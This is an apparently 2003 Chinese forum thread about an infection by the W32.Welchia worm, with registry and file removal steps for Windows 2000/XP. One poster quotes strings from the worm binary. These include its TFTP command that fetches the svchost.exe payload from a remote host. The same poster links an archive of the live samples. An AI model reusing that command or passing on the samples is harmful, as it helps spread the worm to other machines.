紧急求救!如何启用被禁用的RPC服务?

landy

各位XDJM们,我的2000出问题了  我今天发现在D:/WINNT/SYSTEM32下有两个文件:dllhost.exe , svchost.exe  根据最新的病毒疫情我发现我中招了.于是我试着停止任务管理器中,这两个进程,但没有成功,于是我进到服务中想停掉与这两个文件有关的服务,然后把RPC服务停用并禁用掉了.结果,我再也上不了网了,并且当我想重新启用RPC服务的时候也启用不了了哪位DX快救救我的2000server啊!

jwt8289

MM发贴求救,严重关注!
不过我没中过招,也不知如何处理!
哪位DX知道的快快来帮MM解决一下燃眉之急啊!

BlackPad

十七号那天给单位的台机搞这个RPC
一进入桌面就出现那个重启的倒记时画面

后来把补丁文件放在软盘上，在安全模式下装。
居然成公！！
不好意思

但你的问题我还不知道怎么解决！

csd918

如果大家在自己 的system32 目录里的WINS目录里发现DLLHOST.EXE 和SVCHOST.EXE那么你肯定中毒了。。请自己在启动里删除。。并且删除这2个文件。。传染比较快。。希望大家安装防护墙，，这是中国人自己编译的病毒

DLLHOST.EXE里面有这样的话!
=========== I love my wife & baby ~~~ Welcome Chian~~~ Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins http://download.microsoft.com/download/6/9...980-x86-KOR.exe ; http://download.microsoft.com/download/5/8...980-x86-CHT.exe ; http://download.microsoft.com/download/2/8...980-x86-CHS.exe ; http://download.microsoft.com/download/0/1...980-x86-ENU.exe ; http://download.microsoft.com/download/e/3...980-x86-KOR.exe ; http://download.microsoft.com/download/2/3...980-x86-CHT.exe ; http://download.microsoft.com/download/a/a...980-x86-CHS.exe ; http://download.microsoft.com/download/9/8...980-x86-ENU.exe ; tftp -i %s get svchost.exe wins\SVCHOST.EXE

如果正常，我就不是人了。。哈哈。。。这2个文件在WINS目录里。。
这决对不是玩笑！！！　　我是玩ＨＡＣＫ的。。这文件我ＳＮＩＦＦ过。。反编译过。。。我是黑客圈里叫[D]KING

如果有什么问题，，，你可以说

说清楚..这2个文件肯定又会给网络安全打一针强心剂!!!!
如果是XP系统,那么这文件应该是在*:\WINDOWS\SYSTEM32\WINS\里
如果是NT系统..比如2000.那么就应该是在*:\winnt\system32\wins\里
这2个文件大家想研究可以在这里下
http://hy88.nease.net/pingvirus.rar

传染是利用TFTP上传的，，如果大家用不上这东东。完全可以删除TFTP.EXE
正常的SVCHOST.EXE是在SYSTEM32目录里...这个2个文件决对不正常,希望大家警惕
如果你的防护墙被PING..那么你那里有一定有机器中了!!

这东西只攻击PING的通的计算机..希望大家安装防护墙!!!设置不允许被PING

csd918

http://www.pcpop.com/news/2003/8/10149.shtml
最近网上又出现了一种新的恶性蠕虫病毒，名称为W32.Welchia.Worm，该病毒可以进行多重攻击，包括：

　　利用DCOM RPC漏洞（详情），通过使用135端口对特定的Windows XP进行攻击。
　　利用WebDav漏洞（详情），通过使用80端口对特定的Microsoft IIS 5.0进行攻击。

　　我们第一时间为您提供一种清除该病毒的方法：

　　点击开始菜单->运行->键入"regedit"->确定

　　找到"HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices"

　　删除.RpcPatch和RpcTftpd键值

　　退出注册表编辑器

　　删除系统目录下wins目录里面的dllhost.exe和Svchost.exe

　　另外Symantec已经提供该病毒的专杀工具可以来这里下载。

csd918

A.Click Start, and then click Run. (The Run dialog box appears.)
Type regedit
Then click OK. (The Registry Editor opens.)

点击开始菜单->运行->键入"regedit"->确定

B.Navigate to the key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

找到"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services"

C.Delete the subkeys:

RpcPatch

and:

RpcTftpd

删除.RpcPatch

和

RpcTftpd
键值

D.Exit the Registry Editor.
推出注册表编辑器

6. Deleting the Svchost.exe file
Navigate to the %System%\Wins folder and delete the Svchost.exe file.

删除系统目录下\wins目录里面的dllhost.exe和Svchost.exe


具体事项见Symantec的链接

http://securityresponse.symantec ... 2.welchia.worm.html

jwt8289

csd918 好样的,值得大家学习,但好象此方法不能解决MM的问题.
主要是因为MM自己动手禁用了一些服务,现在无法恢复啊!

csd918

1

csd918

2

csd918

楼主试试吧

要睡觉了

明天再说

jwt8289

估计不行,楼主说过,曾试图重新启用该服务,但是不行,问题不在这儿,应该是该服务对应的某个文件有问题吧.